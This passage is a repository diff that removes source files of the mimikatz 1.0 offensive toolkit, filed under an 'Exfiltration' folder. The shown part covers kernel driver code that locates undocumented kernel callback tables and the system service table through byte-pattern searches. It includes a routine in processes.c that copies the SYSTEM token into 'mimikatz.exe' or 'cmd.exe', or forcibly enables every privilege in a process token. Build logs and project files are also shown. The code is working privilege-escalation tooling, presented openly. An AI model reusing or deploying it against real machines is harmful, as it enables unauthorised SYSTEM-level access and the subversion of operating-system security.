return status;
}
NTSTATUS getNotifyRegistryRoutine()
{
NTSTATUS retour = STATUS_NOT_FOUND;
#ifdef _M_X64
UCHAR PTRN_WNT5_Vector[]= {0x4c, 0x8d, 0x3d};
UCHAR PTRN_WNT5_Count[] = {0x0f, 0xc1, 0x05};
UCHAR PTRN_WN60_Head[] = {0x48, 0x8b, 0xf0, 0x48};
LONG OFFS_WN60_Head = -9;
UCHAR PTRN_WALL_Head[] = {0x48, 0x8b, 0xf8, 0x48};
LONG OFFS_WALL_Head = -9;
#elif defined _M_IX86
UCHAR PTRN_WNT5_Vector[]= {0x53, 0x56, 0x57, 0xbb};
UCHAR PTRN_WNT5_Count[] = {0xff, 0xb9};
UCHAR PTRN_WN60_Head[] = {0x8b, 0xcb, 0xe8};
LONG OFFS_WN60_Head = 12;
UCHAR PTRN_WN61_Head[] = {0x8b, 0xc7, 0xe8};
LONG OFFS_WN61_Head = -4;
UCHAR PTRN_WIN8_Head[] = {0x53, 0x8d, 0x55};
LONG OFFS_WIN8_Head = -4;
#endif
PUCHAR refDebut = (PUCHAR) CmUnRegisterCallback, refFin = refDebut + PAGE_SIZE;
PUCHAR pattern = NULL; SIZE_T taille = 0; LONG offsetTo = 0;
if((CmpCallBackVector && CmpCallBackCount) || CallbackListHead)
{
retour = STATUS_SUCCESS;
}
else
{
if(INDEX_OS < INDEX_VISTA)
{
retour = genericPointerSearch((PUCHAR *) &CmpCallBackVector, refDebut, refFin, PTRN_WNT5_Vector, sizeof(PTRN_WNT5_Vector), sizeof(PTRN_WNT5_Vector));
if(NT_SUCCESS(retour))
{
retour = genericPointerSearch((PUCHAR *) &CmpCallBackCount, refDebut, refFin, PTRN_WNT5_Count, sizeof(PTRN_WNT5_Count), sizeof(PTRN_WNT5_Count));
}
}
else
{
if(INDEX_OS < INDEX_7)
{
pattern = PTRN_WN60_Head;
taille = sizeof(PTRN_WN60_Head);
offsetTo= OFFS_WN60_Head;
}
else
{
#ifdef _M_X64
pattern = PTRN_WALL_Head;
taille = sizeof(PTRN_WALL_Head);
offsetTo= OFFS_WALL_Head;
#elif defined _M_IX86
if(INDEX_OS < INDEX_8)
{
pattern = PTRN_WN61_Head;
taille = sizeof(PTRN_WN61_Head);
offsetTo= OFFS_WN61_Head;
}
else
{
pattern = PTRN_WIN8_Head;
taille = sizeof(PTRN_WIN8_Head);
offsetTo= OFFS_WIN8_Head;
}
#endif
}
retour = genericPointerSearch((PUCHAR *) &CallbackListHead, refDebut, refFin, pattern, taille, offsetTo);
}
}
return retour;
}

17
Exfiltration/mimikatz-1.0/driver/notify_reg.h
View File

@ -1,17 +0,0 @@
#pragma once
#include "notify.h"
ULONG * CmpCallBackCount;
PVOID * CmpCallBackVector;
PLIST_ENTRY CallbackListHead;
typedef struct _KIWI_REGISTRY6_CALLBACK
{
LARGE_INTEGER cookie;
PVOID context;
PVOID callback;
UNICODE_STRING altitude;
} KIWI_REGISTRY6_CALLBACK, *PKIWI_REGISTRY6_CALLBACK;
NTSTATUS getNotifyRegistryRoutine();
NTSTATUS kListNotifyRegistry(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining);

111
Exfiltration/mimikatz-1.0/driver/notify_thread.c
View File

@ -1,111 +0,0 @@
#include "notify_thread.h"
ULONG * PspCreateThreadNotifyRoutineCount = NULL;
PVOID * PspCreateThreadNotifyRoutine = NULL;
NTSTATUS kListNotifyThreads(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining)
{
NTSTATUS status;
ULONG i;
PKIWI_CALLBACK monCallBack;
*ppszDestEnd = pszDest; *pcbRemaining= cbDest;
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"kListNotifyThreads\n\n");
if(NT_SUCCESS(status))
{
status = getPspCreateThreadNotifyRoutine();
if(NT_SUCCESS(status))
{
for(i = 0; (i < *PspCreateThreadNotifyRoutineCount) && NT_SUCCESS(status) ; i++)
{
monCallBack = (PKIWI_CALLBACK) KIWI_mask3bits(PspCreateThreadNotifyRoutine[i]);
if(monCallBack != NULL)
{
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"[%.2u] ", i);
if(NT_SUCCESS(status))
{
status = getModuleFromAddr((ULONG_PTR) monCallBack->callback, *ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining);
if(NT_SUCCESS(status) || status == STATUS_NOT_FOUND)
{
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"\n");
}
}
}
}
}
}
return status;
}
NTSTATUS getPspCreateThreadNotifyRoutine()
{
NTSTATUS retour = STATUS_NOT_FOUND;
#ifdef _M_X64
UCHAR PTRN_WNT5_Thread[] = {0x48, 0x8d, 0x35};
LONG OFFS_WNT5_Thread = sizeof(PTRN_WNT5_Thread);
UCHAR PTRN_WNT6_Thread[] = {0x48, 0x8d, 0x0d};
LONG OFFS_WNT6_Thread = sizeof(PTRN_WNT6_Thread);
#elif defined _M_IX86
UCHAR PTRN_WNO8_Thread[] = {0x56, 0xbe};
LONG OFFS_WNO8_Thread = sizeof(PTRN_WNO8_Thread);
UCHAR PTRN_WIN8_Thread[] = {0x53, 0xbb};
LONG OFFS_WIN8_Thread = sizeof(PTRN_WIN8_Thread);
#endif
LONG OFFS_WNT5_Count = sizeof(PVOID) * MAX_NT5_PspCreateProcessNotifyRoutine;
LONG OFFS_WNT6_Count = sizeof(PVOID) * MAX_NT6_PspCreateThreadNotifyRoutine;
PUCHAR pointeur = NULL, pattern = NULL, refDebut = (PUCHAR) PsSetCreateThreadNotifyRoutine, refFin = refDebut + PAGE_SIZE; SIZE_T taille = 0; LONG offsetTo = 0;
LONG offsetToCount = 0;
if(PspCreateThreadNotifyRoutine && PspCreateThreadNotifyRoutineCount)
{
retour = STATUS_SUCCESS;
}
else
{
if(INDEX_OS < INDEX_VISTA)
{
#ifdef _M_X64
pattern = PTRN_WNT5_Thread;
taille = sizeof(PTRN_WNT5_Thread);
offsetTo = OFFS_WNT5_Thread;
#endif
offsetToCount = OFFS_WNT5_Count;
}
else
{
#ifdef _M_X64
pattern = PTRN_WNT6_Thread;
taille = sizeof(PTRN_WNT6_Thread);
offsetTo = OFFS_WNT6_Thread;
#endif
offsetToCount = OFFS_WNT6_Count;
}
#if defined _M_IX86
if(INDEX_OS < INDEX_8)
{
pattern = PTRN_WNO8_Thread;
taille = sizeof(PTRN_WNO8_Thread);
offsetTo = OFFS_WNO8_Thread;
}
else
{
pattern = PTRN_WIN8_Thread;
taille = sizeof(PTRN_WIN8_Thread);
offsetTo = OFFS_WIN8_Thread;
}
#endif
retour = genericPointerSearch(&pointeur, refDebut, refFin, pattern, taille, offsetTo);
if(NT_SUCCESS(retour))
{
PspCreateThreadNotifyRoutine = (PVOID) (pointeur);
PspCreateThreadNotifyRoutineCount = (PULONG) (pointeur + offsetToCount);
if(PspCreateThreadNotifyRoutine && PspCreateThreadNotifyRoutineCount)
retour = STATUS_SUCCESS;
}
}
return retour;
}

11
Exfiltration/mimikatz-1.0/driver/notify_thread.h
View File

@ -1,11 +0,0 @@
#pragma once
#include "notify.h"
#define MAX_NT6_PspCreateThreadNotifyRoutine 64
#define MAX_NT5_PspCreateThreadNotifyRoutine 8
ULONG * PspCreateThreadNotifyRoutineCount;
PVOID * PspCreateThreadNotifyRoutine;
NTSTATUS getPspCreateThreadNotifyRoutine();
NTSTATUS kListNotifyThreads(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining);

146
Exfiltration/mimikatz-1.0/driver/processes.c
View File

@ -1,146 +0,0 @@
#include "processes.h"
const ULONG EPROCESS_OffSetTable[MAX_OS_LEN][MAX_EPROCESS_LEN] =
{
/* INDEX_EPROCESS_NEXT, INDEX_EPROCESS_FLAGS2, INDEX_TOKEN_PRIVS */
#ifdef _M_IX86
/* INDEX_UNK */ {0x0000, 0x0000, 0x0000},
/* INDEX_XP */ {0x0088, 0x0000, 0x0000},
/* INDEX_2K3 */ {0x0098, 0x0000, 0x0000},
/* INDEX_VISTA */ {0x00a0, 0x0224, 0x0040},
/* INDEX_2K8 */ {0x00a0, 0x0224, 0x0040},
/* INDEX_7 */ {0x00b8, 0x026c, 0x0040},
/* INDEX_2K8R2 */ {0x0000, 0x0000, 0x0000},/* n'existe pas ! */
/* INDEX_8 */ {0x00b8, 0x00c0, 0x0040}
#else
/* INDEX_UNK */ {0x0000, 0x0000, 0x0000},
/* INDEX_XP */ {0x0000, 0x0000, 0x0000},/* n'existe pas, XP x64 *est* 2003 x64 */
/* INDEX_2K3 */ {0x00e0, 0x0000, 0x0000},
/* INDEX_VISTA */ {0x00e8, 0x036c, 0x0040},
/* INDEX_2K8 */ {0x00e8, 0x036c, 0x0040},
/* INDEX_7 */ {0x0188, 0x043c, 0x0040},
/* INDEX_2K8R2 */ {0x0188, 0x043c, 0x0040},
/* INDEX_8 */ {0x02e8, 0x02f8, 0x0040}
#endif
};
NTSTATUS sysToken(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining)
{
return listProcessesOrSysToken(pszDest, cbDest, ppszDestEnd, pcbRemaining, ExchangeToken);
}
NTSTATUS listProcesses(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining)
{
return listProcessesOrSysToken(pszDest, cbDest, ppszDestEnd, pcbRemaining, ListProcesses);
}
NTSTATUS privProcesses(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining)
{
NTSTATUS status = STATUS_NOT_SUPPORTED;
if(INDEX_OS >= INDEX_VISTA)
status = listProcessesOrSysToken(pszDest, cbDest, ppszDestEnd, pcbRemaining, FullPrivilegeNT6);
return status;
}
NTSTATUS listProcessesOrSysToken(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining, KIWI_EPROCESS_ACTION action)
{
NTSTATUS status = STATUS_SUCCESS, status2 = STATUS_SUCCESS;
PEPROCESS monProcess = NULL;
PCHAR processName = NULL;
HANDLE processId = NULL;
PACCESS_TOKEN monTokenAcess = NULL;
PKIWI_NT6_PRIVILEGES mesPrivileges = NULL;
HANDLE sysProcessHandle, sysProcessTokenHandle, newSysTokenHandle, processHandle;
PROCESS_ACCESS_TOKEN ProcessTokenInformation;
PULONG pFlags2 = NULL;
*ppszDestEnd = pszDest; *pcbRemaining= cbDest;
for(
monProcess = PsInitialSystemProcess;
NT_SUCCESS(status) &&
(PEPROCESS) ((ULONG_PTR) (*(PVOID *) (((ULONG_PTR) monProcess) + EPROCESS_OffSetTable[INDEX_OS][INDEX_EPROCESS_NEXT]))- EPROCESS_OffSetTable[INDEX_OS][INDEX_EPROCESS_NEXT]) != PsInitialSystemProcess;
monProcess = (PEPROCESS) ((ULONG_PTR) (*(PVOID *) (((ULONG_PTR) monProcess) + EPROCESS_OffSetTable[INDEX_OS][INDEX_EPROCESS_NEXT]))- EPROCESS_OffSetTable[INDEX_OS][INDEX_EPROCESS_NEXT])
)
{
processName = PsGetProcessImageFileName(monProcess);
processId = PsGetProcessId(monProcess);
if(action == ExchangeToken || action == FullPrivilegeNT6)
{
if((RtlCompareMemory("mimikatz.exe", processName, 13) == 13) || (RtlCompareMemory("cmd.exe", processName, 7) == 7))
{
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION,
L"processes::ExchangeToken/FullPrivilegeNT6 \'%S' trouvé :) - PID %u\n", processName, processId
);
if(action == ExchangeToken)
{
status2 = ObOpenObjectByPointer(PsInitialSystemProcess, OBJ_KERNEL_HANDLE, NULL, GENERIC_READ, *PsProcessType, KernelMode, &sysProcessHandle);
if(NT_SUCCESS(status2))
{
status2 = ObOpenObjectByPointer(monProcess, OBJ_KERNEL_HANDLE, NULL, GENERIC_WRITE, *PsProcessType, KernelMode, &processHandle);
if(NT_SUCCESS(status2))
{
status2 = ZwOpenProcessTokenEx(sysProcessHandle, TOKEN_DUPLICATE, OBJ_KERNEL_HANDLE, &sysProcessTokenHandle);
if(NT_SUCCESS(status2))
{
status2 = ZwDuplicateToken(sysProcessTokenHandle, TOKEN_ASSIGN_PRIMARY, NULL, FALSE, TokenPrimary, &newSysTokenHandle);
if(NT_SUCCESS(status2))
{
ProcessTokenInformation.Token = newSysTokenHandle;
ProcessTokenInformation.Thread = 0;
if(INDEX_OS >= INDEX_VISTA)
{
pFlags2 = (PULONG) (((ULONG_PTR) monProcess) + EPROCESS_OffSetTable[INDEX_OS][INDEX_EPROCESS_FLAGS2]);
*pFlags2 &= ~TOKEN_FROZEN_MASK;
}
status2 = ZwSetInformationProcess(processHandle, ProcessAccessToken, &ProcessTokenInformation, sizeof(PROCESS_ACCESS_TOKEN));
if(NT_SUCCESS(status2))
{
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"\nToken échangé :)\n");
}
if(INDEX_OS >= INDEX_VISTA)
{
*pFlags2 |= TOKEN_FROZEN_MASK;
}
ZwClose(newSysTokenHandle);
}
ZwClose(sysProcessTokenHandle);
}
ZwClose(processHandle);
ZwClose(sysProcessHandle);
}
}
}
else
{
if(monTokenAcess = PsReferencePrimaryToken(monProcess))
{
mesPrivileges = (PKIWI_NT6_PRIVILEGES) (((ULONG_PTR) monTokenAcess) + EPROCESS_OffSetTable[INDEX_OS][INDEX_TOKEN_PRIVS]);
mesPrivileges->Present[0] = mesPrivileges->Enabled[0] /*= mesPrivileges->EnabledByDefault[0]*/ = 0xfc;
mesPrivileges->Present[1] = mesPrivileges->Enabled[1] /*= mesPrivileges->EnabledByDefault[1]*/ = //...0xff;
mesPrivileges->Present[2] = mesPrivileges->Enabled[2] /*= mesPrivileges->EnabledByDefault[2]*/ = //...0xff;
mesPrivileges->Present[3] = mesPrivileges->Enabled[3] /*= mesPrivileges->EnabledByDefault[3]*/ = 0xff;
mesPrivileges->Present[4] = mesPrivileges->Enabled[4] /*= mesPrivileges->EnabledByDefault[4]*/ = 0x0f;
PsDereferencePrimaryToken(monTokenAcess);
}
}
}
}
else
{
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"%u\t%S\n", processId, processName);
}
}
return status;
}

33
Exfiltration/mimikatz-1.0/driver/processes.h
View File

@ -1,33 +0,0 @@
#pragma once
#include <ntifs.h>
#include "k_types.h"
#define INDEX_EPROCESS_NEXT 0
#define INDEX_EPROCESS_FLAGS2 1
#define INDEX_TOKEN_PRIVS 2
#define MAX_EPROCESS_LEN 3
#define TOKEN_FROZEN_MASK 0x00008000
typedef struct _KIWI_NT6_PRIVILEGES
{
UCHAR Present[8];
UCHAR Enabled[8];
UCHAR EnabledByDefault[8];
} KIWI_NT6_PRIVILEGES, *PKIWI_NT6_PRIVILEGES;
typedef enum _KIWI_EPROCESS_ACTION
{
ListProcesses,
ExchangeToken,
FullPrivilegeNT6
} KIWI_EPROCESS_ACTION;
extern char* PsGetProcessImageFileName(PEPROCESS monProcess);
extern NTSYSAPI NTSTATUS NTAPI ZwSetInformationProcess (__in HANDLE ProcessHandle, __in PROCESSINFOCLASS ProcessInformationClass, __in_bcount(ProcessInformationLength) PVOID ProcessInformation, __in ULONG ProcessInformationLength);
NTSTATUS listProcesses(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining);
NTSTATUS sysToken(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining);
NTSTATUS privProcesses(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining);
NTSTATUS listProcessesOrSysToken(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining, KIWI_EPROCESS_ACTION action);

83
Exfiltration/mimikatz-1.0/driver/ssdt.c
View File

@ -1,83 +0,0 @@
#include "ssdt.h"
#ifdef _M_X64
PSERVICE_DESCRIPTOR_TABLE KeServiceDescriptorTable = NULL;
#endif
NTSTATUS kSSDT(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining)
{
NTSTATUS status;
USHORT idxFunction;
ULONG_PTR funcAddr;
#ifdef _M_X64
status = getKeServiceDescriptorTable();
if(NT_SUCCESS(status))
{
#endif
*ppszDestEnd = pszDest; *pcbRemaining= cbDest;
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION , L"kSSDT - KeServiceDescriptorTable\t: %p\nkSSDT - KeServiceDescriptorTable.TableSize\t: %u\n", KeServiceDescriptorTable, KeServiceDescriptorTable->TableSize);
for(idxFunction = 0; (idxFunction < KeServiceDescriptorTable->TableSize) && NT_SUCCESS(status) ; idxFunction++)
{
#ifdef _M_IX86
funcAddr = (ULONG_PTR) KeServiceDescriptorTable->ServiceTable[idxFunction];
#else
funcAddr = (ULONG_PTR) KeServiceDescriptorTable->OffsetToService;
if(INDEX_OS < INDEX_VISTA)
{
funcAddr += KeServiceDescriptorTable->OffsetToService[idxFunction] & ~EX_FAST_REF_MASK;
}
else
{
funcAddr += KeServiceDescriptorTable->OffsetToService[idxFunction] >> 4;
}
#endif
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"[%4u]\t: ", idxFunction);
if(NT_SUCCESS(status))
{
status = getModuleFromAddr(funcAddr, *ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining);
if(NT_SUCCESS(status) || status == STATUS_NOT_FOUND)
{
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"\n");
}
}
}
#ifdef _M_X64
}
#endif
return status;
}
#ifdef _M_X64
NTSTATUS getKeServiceDescriptorTable()
{
NTSTATUS retour = STATUS_NOT_FOUND;
UCHAR PTRN_WALL_Ke[] = {0x00, 0x00, 0x4d, 0x0f, 0x45, 0xd3, 0x42, 0x3b, 0x44, 0x17, 0x10, 0x0f, 0x83};
LONG OFFS_WNO8_Ke = -19;
LONG OFFS_WIN8_Ke = -16;
PUCHAR refDebut = NULL, refFin = NULL; LONG offsetTo = 0;
UNICODE_STRING maRoutine;
PUCHAR baseSearch = NULL;
if(KeServiceDescriptorTable)
{
retour = STATUS_SUCCESS;
}
else
{
RtlInitUnicodeString(&maRoutine, L"ZwUnloadKey");
if(baseSearch = (PUCHAR) MmGetSystemRoutineAddress(&maRoutine))
{
refDebut= baseSearch - 21*PAGE_SIZE;
refFin = baseSearch + 16*PAGE_SIZE;
offsetTo = (INDEX_OS < INDEX_8) ? OFFS_WNO8_Ke : OFFS_WIN8_Ke;
retour = genericPointerSearch((PUCHAR *) &KeServiceDescriptorTable, refDebut, refFin, PTRN_WALL_Ke, sizeof(PTRN_WALL_Ke), offsetTo);
}
}
return retour;
}
#endif

13
Exfiltration/mimikatz-1.0/driver/ssdt.h
View File

@ -1,13 +0,0 @@
#pragma once
#include "k_types.h"
#include "mod_memory.h"
#include "modules.h"
NTSTATUS kSSDT(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining);
#ifdef _M_IX86
extern PSERVICE_DESCRIPTOR_TABLE KeServiceDescriptorTable;
#else
PSERVICE_DESCRIPTOR_TABLE KeServiceDescriptorTable;
NTSTATUS getKeServiceDescriptorTable();
#endif

BIN
Exfiltration/mimikatz-1.0/kappfree/Win32/CL.read.1.tlog
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/kappfree/Win32/CL.write.1.tlog
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/kappfree/Win32/cl.command.1.tlog
View File

Binary file not shown.

10
Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.dll.intermediate.manifest
View File

@ -1,10 +0,0 @@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>

2
Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.lastbuildstate
View File

@ -1,2 +0,0 @@
#v4.0:v100
Release|Win32|C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\|

BIN
Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.res
View File

Binary file not shown.

5
Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.write.1.tlog
View File

@ -1,5 +0,0 @@
^C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\kappfree\kappfree.vcxproj
C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\kappfree.lib
C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\kappfree.lib
C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\kappfree.exp
C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\kappfree.exp

1
Exfiltration/mimikatz-1.0/kappfree/Win32/link-cvtres.read.1.tlog
View File

@ -1 +0,0 @@


1
Exfiltration/mimikatz-1.0/kappfree/Win32/link-cvtres.write.1.tlog
View File

@ -1 +0,0 @@


BIN
Exfiltration/mimikatz-1.0/kappfree/Win32/link.command.1.tlog
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/kappfree/Win32/link.read.1.tlog
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/kappfree/Win32/link.write.1.tlog
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/kappfree/Win32/mt.command.1.tlog
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/kappfree/Win32/mt.read.1.tlog
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/kappfree/Win32/mt.write.1.tlog
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/kappfree/Win32/rc.command.1.tlog
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/kappfree/Win32/rc.read.1.tlog
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/kappfree/Win32/rc.write.1.tlog
View File

Binary file not shown.

34
Exfiltration/mimikatz-1.0/kappfree/kappfree.c
View File

@ -1,34 +0,0 @@
/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : http://creativecommons.org/licenses/by/3.0/fr/
*/
#include "kappfree.h"
extern __declspec(dllexport) void __cdecl startW(HWND hwnd, HINSTANCE hinst, LPWSTR lpszCmdLine, int nCmdShow)
{
HANDLE monToken, monSuperToken;
wchar_t * commandLine;
PROCESS_INFORMATION mesInfosProcess;
STARTUPINFO mesInfosDemarrer;
if(OpenProcessToken(GetCurrentProcess(), TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_QUERY /*| TOKEN_IMPERSONATE*/, &monToken))
{
if(CreateRestrictedToken(monToken, SANDBOX_INERT, 0, NULL, 0, NULL, 0, NULL, &monSuperToken))
{
RtlZeroMemory(&mesInfosProcess, sizeof(PROCESS_INFORMATION));
RtlZeroMemory(&mesInfosDemarrer, sizeof(STARTUPINFO));
mesInfosDemarrer.cb = sizeof(STARTUPINFO);
commandLine = _wcsdup(lpszCmdLine);
if(CreateProcessAsUser(monSuperToken, NULL, commandLine, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &mesInfosDemarrer, &mesInfosProcess))
{
CloseHandle(mesInfosProcess.hThread);
CloseHandle(mesInfosProcess.hProcess);
}
free(commandLine);
CloseHandle(monSuperToken);
}
CloseHandle(monToken);
}
}

9
Exfiltration/mimikatz-1.0/kappfree/kappfree.h
View File

@ -1,9 +0,0 @@
/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : http://creativecommons.org/licenses/by/3.0/fr/
*/
#pragma once
#include <windows.h>
extern __declspec(dllexport) void __cdecl startW(HWND hwnd, HINSTANCE hinst, LPWSTR lpszCmdLine, int nCmdShow);

BIN
Exfiltration/mimikatz-1.0/kappfree/kappfree.rc
View File

Binary file not shown.

119
Exfiltration/mimikatz-1.0/kappfree/kappfree.vcxproj
View File

@ -1,119 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{E7A85049-E31E-4575-B6A0-E6F1EAA9EEB0}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>kappfree</RootNamespace>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<UseOfMfc>Static</UseOfMfc>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<UseOfMfc>Static</UseOfMfc>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\</OutDir>
<IntDir>$(Platform)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\</OutDir>
<IntDir>$(Platform)\</IntDir>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>
</PrecompiledHeader>
<Optimization>Full</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;KAPPFREE_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<AdditionalIncludeDirectories>$(SolutionDir)/commun;$(SolutionDir)/modules</AdditionalIncludeDirectories>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<StringPooling>true</StringPooling>
<ExceptionHandling>false</ExceptionHandling>
<FloatingPointModel>Fast</FloatingPointModel>
<FloatingPointExceptions>false</FloatingPointExceptions>
<CreateHotpatchableImage>false</CreateHotpatchableImage>
<ErrorReporting>None</ErrorReporting>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<AdditionalDependencies>advapi32.lib;%(AdditionalDependencies)</AdditionalDependencies>
<LinkErrorReporting>NoErrorReport</LinkErrorReporting>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>
</PrecompiledHeader>
<Optimization>Full</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;KAPPFREE_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<AdditionalIncludeDirectories>$(SolutionDir)/commun;$(SolutionDir)/modules</AdditionalIncludeDirectories>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<StringPooling>true</StringPooling>
<ExceptionHandling>false</ExceptionHandling>
<FloatingPointModel>Fast</FloatingPointModel>
<FloatingPointExceptions>false</FloatingPointExceptions>
<CreateHotpatchableImage>false</CreateHotpatchableImage>
